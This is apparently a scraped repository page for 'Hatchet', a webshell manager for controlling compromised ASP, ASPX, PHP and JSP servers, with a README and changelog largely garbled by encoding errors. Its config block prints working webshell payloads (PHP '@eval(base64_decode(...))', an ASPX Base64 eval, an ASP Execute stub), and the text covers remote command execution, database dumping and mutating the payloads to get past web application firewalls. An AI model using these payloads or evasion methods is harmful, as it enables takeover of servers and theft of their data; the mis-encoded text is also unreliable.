hatchet icon indicating copy to clipboard operation
hatchet copied to clipboard

verified publisher icon euphrat1ca

Metadata

cknife(webshell manager)

Hatchet VS2005瀹屾暣婧愮爜

鍏嶈矗鐢虫槑锛?璇蜂娇鐢ㄨ€呮敞鎰忎娇鐢ㄧ幆澧冨苟閬靛畧鍥藉鐩稿叧娉曞緥娉曡锛?鐢变簬浣跨敤涓嶅綋閫犳垚鐨勫悗鏋滄湰鍘傚涓嶆壙鎷呬换浣曡矗浠伙紒

  1. 璇存槑锛?鎴戞槸涓€涓骇鍒€鐨勶紝鐢ㄤ簬浠€涔堢敤閫旓紝鐢辨偍鑷閫夋嫨銆?/p>

  2. 鑷磋阿锛?鑿滃垁鏌愬墠杈堝強鍚勪綅缃戝弸鐨勫缓璁?/p>

  3. 寮辩偣锛?瀛樺湪缁嗚妭鏂归潰娌″鐞嗗ソ 鏁版嵁搴撲笌鑿滃垁鏈夋墍鍖哄埆涓嶈兘鍏辩敤

  4. 浼樼偣锛?鎸佺画鏇存柊 蹇嵎閿搷浣?娉ㄥ唽琛ㄨ鍙?HTTP澶磋嚜琛屾帶鍒?POST閮ㄥ垎鏁版嵁鍙嚜瀹氫箟锛岀獊鐮村畨鍏ㄧ嫍绛塛AF(涓€鍙ヨ瘽闇€鑷澶勭悊) PHP Warning 璀﹀憡鍘婚櫎锛岄伩鍏嶆煇浜沇AF绛夎褰?PHP鏀寔澶氱鎵ц鍛戒护锛屽畨鍏ㄦā寮忎篃鑳芥墽琛?PHP绠$悊PostgreSQL銆丱DBC_MSSQL銆丳DO_MYSQL銆丳DO_MSSQL鏁版嵁搴?HTTP浠g悊锛屽彧瀹屾垚PHP銆傛敮鎸丠TTP[S] GET POST 鏂囦欢澶瑰弻鍑昏繘鍏ワ紝鏍戝舰妗嗙殑涓婁竴灞傚彲浠ョ偣鍑?鏀寔NTLM楠岃瘉 COMBO鍘嗗彶璁板綍 鏀寔閫夋嫨鏁版嵁搴撳悗鐩存帴鎵цSQL鍛戒护 鏁版嵁搴撳彸閿幏鍙?0鏉¤褰?鏀寔JSP涓婁紶 鏂囦欢[澶筣鍓垏(鏂囦欢绉诲姩鏈哄埗绉掔Щ) 鏂囦欢[澶筣澶氶€夊垹闄?鏂囦欢[澶筣澶氶€変笅杞?搴旇鏉ヨ涓嶄細宕╂簝 鍙抽敭瀵煎嚭鏁版嵁搴撴煡璇㈢粨鏋滀繚瀛楾XT锛岄粯璁ゆ瘡涓€涓瓧娈电敤涓€涓€怲AB銆戝垎寮€锛屽鏋滈渶瑕佺敤鍏朵粬瀛楃璇峰湪濉啓淇濆瓨鏂囦欢鍚嶇殑鏃跺€欙紝鍚庨潰鍔犱笂&&锛岀揣璺熷垎闅旂銆傚: table.txt&&@@ 鏁版嵁搴撴墽琛孲QL鏌ヨ鏃讹紝鐩存帴瀵煎嚭鍒版湰鍦版枃浠讹紝涓嶆樉绀哄埌鍒楄〃妗嗐€係QL鍛戒护鍚庨潰鍔犱笂--file:绱ц窡瑕佸鍑哄埌鐨勬枃浠跺悕銆傚: Select * From Members Limit 0,20--file:1.txt 鏀寔PHP鑴氭湰鐨勬暟鎹簱绠$悊锛岃繙绋嬪浠姐€傚: Select * From Members Limit 0,20--save:data.sql--split:@@

  5. 鍚庨棬锛?缂╁皬浣撶Н宸插姞UPX澹?缁濇棤鏈夋剰娣诲姞鐨勫悗闂紝浣嗕笁娴佺殑涓氫綑鎶€鑳戒笉鎺掗櫎琚繙绋嬫孩鍑虹殑BUG 鏂囦欢: C:\Projects\Hatchet\release\Hatchet.exe 澶у皬: 269312 瀛楄妭 鏂囦欢鐗堟湰: 1.0.0.1 淇敼鏃堕棿: 2014骞?鏈?6鏃? 12:19:43 MD5: 91FAA43F3F89083F2E9C78D05E13673C SHA1: A1B598CB4EB47554E6F191A7EB33111F462C77FD CRC32: C094BD42

	/*
		[Header]
		User-Agent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
		Referer=1
		X-Forwarded-For=1
		[/Header]
		[Headers]
		Accept-Language: en-us
		Content-Type: application/x-www-form-urlencoded
		[/Headers]
		[POST]
		ASP_POST_DATA==Execute("Execute(""On+Error+Resume+Next:Response.Clear:

		ASPX_POST_DATA==Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(%nPageCode%).GetString(System.Convert.FromBase64String("%szBase64EvalCode%")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();

		PHP_POST_DATA==@eval(base64_decode($_POST[z0]));&z0=

		PHP_POST_Z0_DATA=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);
		[/POST]

		##################################################
		#浠ヤ笅鏄鏄?		璇蜂弗鏍间繚鎸佽鏍煎紡锛屽ぇ灏忓啓涓嶄竴鏍?		Referer 涓? 鍒欑▼搴忚嚜鍔ㄦ坊鍔?		X-Forwarded-For 涓? 鍒欑▼搴忚嚜鍔ㄩ殢鏈虹敓鎴愭坊鍔?		濡傛灉瑕佽嚜宸辨墜鍔ㄦ坊鍔犲叾鍥哄畾鍊硷紝璇疯涓?锛屽悗鍦╗Headers]閲屾坊鍔犲嵆鍙€?		[POST]閲屼负POST鐨勯儴鍒嗘暟鎹紝鍙嚜琛屽彉寮傝繖娈典唬鐮侊紝杩囧畨鍏ㄧ嫍绛夛紝寰堢伒娲荤殑鍝︼綖
		%nPageCode% 涓虹▼搴忛渶瑕佸鐞嗙殑缂栫爜锛岃淇濈暀
		%szBase64EvalCode% 涓虹▼搴忛渶瑕佸鐞嗙殑鎵ц浠g爜锛岃淇濈暀
	*/

2013.12.03

  • 鏈湴鏁版嵁搴撳崟寮曞彿
  • CMD閫夋嫨鎵€鏈夛紝浠绘剰閿鐩?/li>
  • FileSave CTRL+A

2013.12.07

  • JSP 浼犻€掓病鏈?UrlEnCode
  • 澧炲姞鏂囦欢澶逛笅杞?/li>
  • 绔欑偣绠$悊锛屽厜鏍嘦RL鍏ㄩ€?/li>
  • szMyBase64Encode.Replace("+","%2B");

2013.12.09

  • 澧炲姞 HTTP 閿欒鏄剧ず
  • 淇涓嬭浇鐩綍锛寃in linux / \
  • 淇'\0'鏍煎紡鍖栧彂鐢熺殑鎴柇

2013.12.10

  • TAB鏍囩OK
  • ASPX鑴氭湰缂栫爜

2013.12.11

  • TAB鐨刋鑼冨洿鍔犲ぇ
  • PHP鑴氭湰杩囧畨鍏ㄧ嫍

2013.12.12

  • eval preg_replace鍧囧彲浠ヤ娇鐢ㄨ繃鐙楃増鏈?chr(45).
  • 绋嶅井瀹屽杽涓€涓嬬姸鎬佹爮

2013.12.13

  • 涓嬭浇銆佷笂浼犳枃浠跺紑鍚竴涓柊绾跨▼

2013.12.18

  • asp \r\nOn+Error 杩囩嫍
  • aspx var err\r\n 杩囩嫍
  • Shell绫诲瀷缂栬緫鏃讹紝鍐呭涓€鏍蜂笉鏇存柊
  • 鏂囦欢绠$悊閲嶅懡鍚嶃€佹洿鏀规椂闂达紝鍐呭涓€鏍蜂笉鏇存柊
  • 蹇嵎閿?F2 鏂囦欢绠$悊閲嶅懡鍚?/li>

2013.12.19

  • 澧炲姞鑷啓浠g爜
  • 澧炲姞HTTP澶?INI閲岄厤缃?鍦ㄤ富鐣岄潰鍙抽敭閲岋紝濡傛灉鏂囦欢涓嶅瓨鍦紝绗竴娆¤嚜鍔ㄧ敓鎴?

2013.12.21

  • 淇鏂囦欢鍐呭Linux(\n)鎹㈣鏄剧ず
  • 鏂囦欢鍐呭 Ctrl+F 鏌ユ壘
  • 淇澶氱嚎绋嬶紝闅忔満IP閮戒竴鏍?/li>
  • PHP Warning 璀﹀憡鍘婚櫎
  • 鑷啓浠g爜蹇嵎閿?Ctrl+A锛孎5鎵ц

2013.12.23

  • 澧炲姞鍙抽敭鏁版嵁搴撴煡璇㈢粨鏋滃鍑篢XT锛岄粯璁ゆ瘡涓€涓瓧娈电敤涓€涓€怲AB銆戝垎寮€锛屽鏋滈渶瑕佺敤鍏朵粬瀛楃璇峰湪濉啓淇濆瓨鏂囦欢鍚嶇殑鏃跺€欙紝鍚庨潰鍔犱笂&&锛岀揣璺熷垎闅旂銆傚: table.txt&&,
  • 澧炲姞鏁版嵁搴撴墽琛孲QL鏌ヨ鏃讹紝鐩存帴瀵煎嚭鍒版湰鍦版枃浠讹紝涓嶆樉绀哄埌鍒楄〃妗嗐€係QL鍛戒护鍚庨潰鍔犱笂--file:绱ц窡瑕佸鍑哄埌鐨勬枃浠跺悕銆傚: Select * From Members Limit 0,20--file:1.txt
  • 鏁版嵁搴撴煡璇㈢粨鏋滄樉绀猴紝璁$畻閿欒鐨勫皬Bug
  • 鏁版嵁搴撻敊璇樉绀虹殑闂

2013.12.24

  • UTF8 GBK浜掓崲鐨凚UG

2013.12.27

  • 澧炲姞杩炴帴鏁版嵁搴撲唬鐮佸疄渚?/li>
  • 澧炲姞鍛戒护鎵ц鏂瑰紡(system,passthru,shell_exec,exec,WScript.shell)

2013.12.29

  • 澧炲姞PHP绠$悊PostgreSQL鏁版嵁搴?/li>
  • PHP MySQL灏戝啓z1=

2014.01.04

  • 澧炲姞PHP绠$悊ODBC_MSSQL鏁版嵁搴?/li>

2014.01.07

  • 鏁版嵁搴撳鍑篐TML缂栫爜璁剧疆charset=GBK
  • JSP鏌ヨ鏁版嵁搴撻敊璇笉寮笰fxMessageBox

2014.01.08

  • Shell鍒楄〃鎺掑簭
  • Shell鏃ユ湡鐨勬湀浠芥棩鏈熸坊鍔犲墠瀵奸浂
  • 淇涓婁紶鏂囦欢澶у皬闄愬埗

2014.01.09

  • 淇CMD锛宑ls娓呯┖鍚庝笂涓嬬澶磋繕鍘熸棫鍐呭

2014.01.10

  • 鏄剧ず涓嬭浇杩涘害澶у皬
  • 閫夋嫨淇濆瓨鏂囦欢澶瑰彲鍒犻櫎|OFN_NOCHANGEDIR
  • 鏂囦欢涓嬭浇瀹屾垚锛岃嚜鍔ㄦ墦寮€鏂囦欢澶归€夊畾鏂囦欢銆?/li>

2014.01.14 鎰熻阿luoye

  • 鏂囦欢绠$悊璺緞澶勭悊闂銆傞槻姝㈣皟鐨殑浼欎即C:\\\\\\鎴朇://////////鎴朇:
  • JSP db2杩炴帴渚嬪瓙鏈夎password=123456;鍚庨潰鏈夊垎鍙枫€?/li>

2014.01.24

  • 澧炲姞鏍囬鏍忓彸閿郴缁熻彍鍗?/li>
  • 璁板繂閫夋嫨鏍囩锛屾枃浠剁鐞嗭紝鏂囦欢鍐呭绠$悊锛屽唴瀹瑰叧闂紝鍥炲埌鏂囦欢绠$悊
  • 璺€斿啀杩滐紝涔熻鍥炲銆傚皬浼欎即浠槬鑺傚揩涔愶紒锛侊紒

2014.02.11

  • 杩愯杞欢锛屽鏋滃瓨鍦↖NI锛岃嚜鍔ㄥ姞杞姐€備箣鍓嶉渶瑕佸彸閿墠浼氬姞杞姐€侽nMainUpdateIni(bool bNoCreat=true);
  • 杩?60缃戠珯鍗+
  • POST鍓嶄竴灏忔鏁版嵁鍙湪INI閲岃嚜瀹氫箟锛岀粡鐮旂┒鍙獊鐮村畨鍏ㄧ嫍绛塛AF銆?"=Execute("Execute(""On+Error+Resume+Next: ==> Ini_szASP_POST_DATA + " "=%40eval%09%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0= ==> Ini_szPHP_POST_DATA + "

2014.02.21

  • 鏁版嵁搴撳拰鏂囦欢绠$悊鏍戝舰妗嗗氨鍦扮紪杈戯紝鍙槸鏂逛究澶嶅埗鍐呭锛屼笉浼氭敼鍙樻湇鍔″櫒銆?/li>
  • 淇鑾峰彇鍒楄〃妗嗙殑灏忛棶棰樸€侴etNextItem < 0 return;
  • 澧炲姞鏂囦欢澶嶅埗,鏂囦欢鍓垏(浠匬HP)

2014.02.22

  • 澧炲姞鏂囦欢鍓垏(ASP ASPX JSP)

2014.03.05

  • 淇PreTranslateMessage浜嬩欢澶勭悊蹇樿鍙婃椂杩斿洖
  • 淇鏂囦欢绠$悊锛屽悗缁鍔犵殑鏄犲皠纾佺洏缃戠粶纾佺洏绛夛紝鏄剧ず浼氭湁闂銆?/li>

2014.03.17

  • 鏌愮鍘熷洜锛屾洿鏀硅蒋浠跺悕绉? Hatchet
  • 澧炲姞POST鐨剒0鍓嶉儴鍒嗚嚜瀹氫箟锛岀獊鐮村畨鍏ㄥ疂鐨凚ase64鍏抽敭璇嶃€?/li>
  • 淇CMD妗嗭紝绛夊瀛椾綋锛屽榻愮殑闂銆?/li>

2014.03.18

  • 淇CMD杩斿洖璺緞鐨勬埅鍙栭棶棰?/li>
  • 淇浠g爜鎵ц锛岀瓑瀹藉瓧浣擄紝瀵归綈鐨勯棶棰樸€?/li>
  • 淇鑾峰彇鏂囦欢鍐呭锛岀瓑瀹藉瓧浣擄紝瀵归綈鐨勯棶棰樸€?/li>
  • 澧炲姞閮ㄥ垎澶氱嚎绋嬶紝涓嶅崱鐣岄潰銆?/li>
  • 澧炲姞浠g爜鎵ц瀵煎嚭瀵煎叆銆?/li>

2014.04.01

  • 鐣岄潰澶ф敼鍔?闈炲父鎰熻阿p1n9y_fly)
  • 澧炲姞澶ч儴鍒嗗绾跨▼
  • 澧炲姞閮ㄥ垎蹇嵎閿?/li>

2014.04.02

  • 鍐嶆淇闅忔満IP閮戒竴鏍?/li>
  • 鍙栨秷鑷姩娣诲姞Cookie锛屽鑷碔NI閲屽~鐨凜ookie涓嶈兘琚坊鍔犱笂 INTERNET_FLAG_NO_COOKIES
  • 澧炲姞蹇嵎閿?Ctrl+V
  • 澧炲姞绯荤粺鎵樼洏
  • 鏂囦欢鍐呭淇濆瓨绾跨▼鍙橀噺鏈垵濮嬪寲(鎰熻阿Xi鎬?
  • 淇閲嶅懡鍚嶃€佹柊寤虹洰褰曪紝濡傛灉鏂囦欢[澶筣瀛樺湪锛岃鐩栥€?鎰熻阿Xi鎬?

2014.04.04

  • 澧炲姞涓婁紶鏂囦欢鍚庤嚜鍔ㄥ埛鏂板垪琛?/li>
  • 淇PHP鏂囦欢[澶筣鍙鍙啓鏍囨敞銆傛崲鎴恑s_readable is_writable(鎰熻阿鏁屾晫鍠?
  • 淇鏍戝舰妗嗭紝鍒ゆ柇缁欏畾鏍戦」鏄惁鍖呭惈瀛愰」,2014.04.04 BUG锛屾湁瀛愰」锛屼笉涓€瀹氬凡缁忓瓨鍦?鎰熻阿鏁屾晫鍠?
  • 淇鏂囦欢绠$悊C:////杩欑璺緞
  • 淇CMD Ctrl+V
  • 澧炲姞Shell鍒楄〃蹇嵎閿?Insert(娣诲姞) Delete(鍒犻櫎) Enter(缂栬緫)
  • 澧炲姞鏂囦欢绠$悊鍒楄〃蹇嵎閿紝鍥炶溅杩涘叆鏂囦欢澶规垨鑰呮枃浠跺唴瀹圭紪杈戙€?/li>

2014.04.07

  • 澧炲己澶氭枃浠跺鐞?/li>
  • 淇鏂囦欢绠$悊鏍戝舰妗嗗皬闂
  • 鏇存崲鏂囦欢绠$悊EDIT->COMBO
  • 澧炲姞娉ㄥ唽琛ㄧ鐞?/li>

2014.04.14

  • 澧炲姞娉ㄥ唽琛ㄦ湰鍦扮紦瀛?/li>
  • 绋嶅井瀹屽杽涓€涓嬬姸鎬佹爮
  • 淇asp鏁版嵁搴撴埅鍙栫殑BUG(鎰熻阿Ciph2r)
  • 淇缂栬緫鐨勫璇濇鏄剧ず浣嶇疆闂
  • 澧炲姞COMBO璁板綍

2014.05.07

  • 澧炲姞鏄剧ず鐗堟湰
  • 淇CMD cls淇濈暀绯荤粺淇℃伅
  • 澧炲姞CMD Please wait...
  • 澧炲姞鏁版嵁搴撳彸閿煡璇?0鏉?/li>
  • 澧炲姞鏁版嵁搴揈SC鍙栨秷缂栬緫
  • 淇鏂囦欢鍥炬爣szIcoTemp鍙橀噺蹇樿鍒濆鍖?/li>
  • 鏂囦欢绠$悊锛屽洖杞︽垨鍙屽嚮鐨勬枃浠跺鏋滄槸浠ヤ笅寮瑰嚭涓嬭浇 .jpg.gif.png.bmp.jpeg.ico .zip.rar.tgz.7z.tar.gz.iso.cab.bz2.jar.dmg .exe.msi.dll.sys.avi.mpeg.mpg.vob.rmvb.wmv.mp3.mp4.3gp.ogg.voc .swf.pdf.flv.fla.psd.doc.docx.xls.xlsx.ppt.pptx.mdb.rtf

2014.05.09

  • 涓婚〉澧炲姞澶嶅埗URL鍦板潃(Ctrl+C)
  • 鏂囦欢澶瑰弻鍑昏繘鍏?鏍戝舰妗嗚窡杩?鎰熻阿Lee Swagger)
  • 鏂囦欢澶瑰弻鍑昏繘鍏?鏍戝舰妗嗛€夋嫨椤瑰苟娌℃湁鏀瑰彉銆係electItem鎵ц澶辫触锛屾崲OnNMClickTree鍒ゆ柇
  • 澧炲姞ASPX POST鏁版嵁INI鑷畾涔?/li>
  • MYSQL濡傛湁涓嶆甯哥殑琛ㄥ悕锛屼腑鏂囥€佺┖鏍肩瓑锛岃鐢╜鍖呭惈琛ㄥ悕(鎰熻阿Hancock)

2014.05.21

  • 澧炲姞鍏ㄩ儴EDIT锛孋TRL+A
  • 淇MAIN IDC_EDIT_FIND锛屽ぇ灏忔敼鍙橈紝琚鐩栭殣钘?/li>
  • 澧炲姞Wget绾跨▼
  • 淇鏁版嵁搴撴樉绀虹粨鏋滐紝缂栫爜闂瀵艰嚧鐨勬寰幆
  • 淇asp鐗规畩鐜缂撳瓨鐨勯棶棰樸€俁esponse.Clear
  • 淇asp鏁版嵁搴揝I鍙橀噺鍒濆鍖?/li>
  • 浼樺寲鏁版嵁搴撹繑鍥炵殑鍒楄〃瀹藉害

2014.06.06

  • 澧炲姞娴忚鍣ㄥ姛鑳斤紝浠ヤ究鏀寔NTLM楠岃瘉(鎰熻阿R)
  • 淇CMD濡傛灉鎵€鍦ㄥ厜鏍囦綅缃彲鏇存敼绮樿创(鎰熻阿R)
  • 澧炲姞CMD锛孍SC鎸夐敭锛屾竻闄ゅ綋鍓嶈緭鍏ョ殑鍛戒护
  • 澧炲姞娴忚鍣ㄧ姸鎬佸拰鍔犺浇瀹屾垚鍚庣殑鍦板潃鏄剧ず

2014.07.02

  • 淇濡傛灉鏍囩宸插叧闂紝绾跨▼杩樺湪杩愯銆傚鑷寸殑绋嬪簭宕╂簝銆俰f (pDlg->m_hWnd == NULL)
  • 澧炲姞PDO绠$悊mysql鍜宮ssql鏁版嵁搴?/li>

2014.07.07

  • 淇PHP鎵цcmd鍙橀噺鏈垵濮嬪寲$ret=1锛堝嚱鏁扮鐢ㄥ鑷寸殑鍑洪敊锛?/li>
  • 淇CMD鏄剧ず鐨勫皬闂
  • 鍒囨崲鏍囩锛屽綋鍓岲ialog鑾峰緱鐒︾偣
  • 鏀寔PHP鑴氭湰鐨勬暟鎹簱绠$悊锛岃繙绋嬪浠?/li>

2014.08.26

  • 鏂囦欢涓婁紶鍒嗗潡缂╁皬锛?1200
  • 娣诲姞涓€浜涚姸鎬?/li>
  • Data select show
  • CMD鍛戒护鎺掑簭
  • Data Ctrl+C鍜孎2蹇嵎閿?/li>
  • 淇ComboBox涓嬫媺楂樺害
  • 娣诲姞Shell鍒ゆ柇鏄惁瀛樺湪

Metadata

25
Stars
20
Forks
Watchers

Owner

verified publisher icon euphrat1ca

Metadata

cknife(webshell manager)

Back